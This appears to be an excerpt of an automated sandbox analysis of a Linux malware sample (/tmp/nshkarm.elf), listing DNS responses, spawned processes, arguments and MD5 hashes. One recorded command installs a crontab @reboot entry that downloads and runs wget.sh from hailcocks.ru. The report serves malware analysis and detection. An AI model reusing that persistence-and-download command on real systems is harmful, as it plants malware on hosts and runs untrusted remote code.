Dec 17, 2024 15:18:50.218965054 CET | 217.160.70.42 | 192.168.2.23 | 0x6853 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:19:10.962188959 CET | 168.235.111.72 | 192.168.2.23 | 0x690b | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:19:10.962188959 CET | 168.235.111.72 | 192.168.2.23 | 0x690b | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:19:17.799712896 CET | 202.61.197.122 | 192.168.2.23 | 0xc4a8 | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:19:17.799712896 CET | 202.61.197.122 | 192.168.2.23 | 0xc4a8 | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:19:24.664244890 CET | 65.21.1.106 | 192.168.2.23 | 0x37ea | No error (0) | 212.64.215.71 | A (IP address) | IN (0x0001) | false | ||
Dec 17, 2024 15:19:24.664244890 CET | 65.21.1.106 | 192.168.2.23 | 0x37ea | No error (0) | 80.78.26.121 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 14:17:52 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:17:52 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 14:17:52 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:17:52 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 14:17:56 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkarm.elf |
Arguments: | /tmp/nshkarm.elf |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkarm.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkarm.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkarm.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 14:17:57 |
Start date (UTC): | 17/12/2024 |
Path: | /tmp/nshkarm.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |